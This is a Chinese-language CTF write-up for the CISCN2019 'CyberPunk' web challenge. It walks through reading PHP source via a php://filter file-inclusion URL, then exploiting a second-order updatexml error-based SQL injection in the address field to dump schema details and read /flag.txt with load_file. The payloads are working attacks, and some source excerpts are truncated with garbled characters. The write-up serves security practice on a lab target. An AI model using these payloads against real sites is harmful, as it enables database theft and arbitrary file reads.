题目来源:[CISCN2019 华北赛区 Day1 Web5]
链接:https://buuoj.cn/challenges#[CISCN2019%20%E5%8D%8E%E5%8C%97%E8%B5%9B%E5%8C%BA%20Day1%20Web5]CyberPunk
考察:php伪协议,xpath报错注入,load_file
参考:https://www.cnblogs.com/wangtanzhi/p/12318551.html
第一步
首先进入页面,index界面可以用get的方式提交file参数,即可使用php伪协议直接读取源码
http://xxx.xxx/index.php?file=php://filter/convert.base64-encode/resource=index.php
第二步
<?php //index.php
ini_set('open_basedir', '/var/www/html/');
// $file = $_GET["file"];
$file = (isset($_GET['file']) ? $_GET['file'] : null);
if (isset($file)){
if (preg_match("/phar|zip|bzip2|zlib|data|input|%00/i",$file)) {
echo('no way!');
exit;
}
@include($file);
}
?>
<!--?file=?-->
<?php //change.php
require_once "config.php";
if(!empty($_POST["user_name"]) && !empty($_POST["address"]) && !empty($_POST["phone"]))
{
$msg = '';
$pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';
$user_name = $_POST["user_name"];
$address = addslashes($_POST["address"]);
$phone = $_POST["phone"];
if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){
$msg = 'no sql inject!';
}else{
$sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'";
$fetch = $db->query($sql);
}
if (isset($fetch) && $fetch->num_rows>0){
$row = $fetch->fetch_assoc();
$sql = "update `user` set `address`='".$address."', `old_address`='".$row['address']."' where `user_id`=".$row['user_id'];
$result = $db->query($sql);
if(!$result) {
echo 'error';
print_r($db->error);
exit;
}
$msg = "订å•ä
<?php //search.php
require_once "config.php";
if(!empty($_POST["user_name"]) && !empty($_POST["phone"]))
{
$msg = '';
$pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';
$user_name = $_POST["user_name"];
$phone = $_POST["phone"];
if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){
$msg = 'no sql inject!';
}else{
$sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'";
$fetch = $db->query($sql);
}
if (isset($fetch) && $fetch->num_rows>0){
$row = $fetch->fetch_assoc();
if(!$row) {
echo 'error';
print_r($db->error);
exit;
}
$msg = "<p>姓å:".$row['user_name']."</p><p>, 电è¯:".$row['phone']."</p><p>, 地å€:".$row['address']."</p>";
} else {
$msg = "未找到订å•!";
发现在3个php中,都对user_name和pattern进行了过滤,因此只能在address上进行注入。
又注意到,只在change.php中对address执行了sql语句,而在search.php中,只是从数据库中返回了address的值。故这是一个二次注入,故操作在index.php和change.php中
//数据库
1' where user_id=updatexml(1,concat(0x7e,(select substr(database(),1,20)),0x7e),1)#
//表名
1' where user_id=updatexml(1,concat(0x7e,(select substr(table_name,1,20)from information_schema.tables where table_schema='ctfusers'),0x7e),1)#
//字段
1' where user_id=updatexml(1,concat(0x7e,(select substr(group_concat(column_name),1,20)from information_schema.columns where table_name='user'),0x7e),1)#
//数据
1' where user_id=updatexml(1,concat(0x7e,(select substr(load_file('/flag.txt'),1,20)),0x7e),1)#
1' where user_id=updatexml(1,concat(0x7e,(select substr(load_file('/flag.txt'),20,50)),0x7e),1)#
得到flag
flag{05e89701-1f01-4719-965c-3d59d7e0f664}
xpath报错注入
updatexml(1,concat(0x7e,SUBSTR((SELECT f14g from f14g LIMIT 0,1),1,24),0x7e),1) # 最多显示32位,需要配合substr使用
php伪协议
http://xxx.xxx/index.php?file=php://filter/convert.base64-encode/resource=index.php # 以base64方式读取指定页面源码